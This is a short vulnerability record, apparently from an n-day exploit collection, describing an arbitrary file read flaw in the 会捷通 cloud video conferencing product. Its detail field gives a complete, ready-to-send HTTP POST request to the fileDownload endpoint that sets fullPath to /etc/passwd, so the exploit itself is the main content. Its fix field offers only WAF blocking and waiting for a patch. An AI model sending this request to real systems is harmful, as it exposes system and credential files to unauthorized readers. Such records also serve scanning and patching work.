vendor = "会捷通"
name = "会捷通云视讯 fileDownload 任意文件读取漏洞"
type = "任意文件读取"
version = "未知"
path = "/fileDownload?action=downloadBackupFile"
detail = "POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 fullPath=%2Fetc%2Fpasswd"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
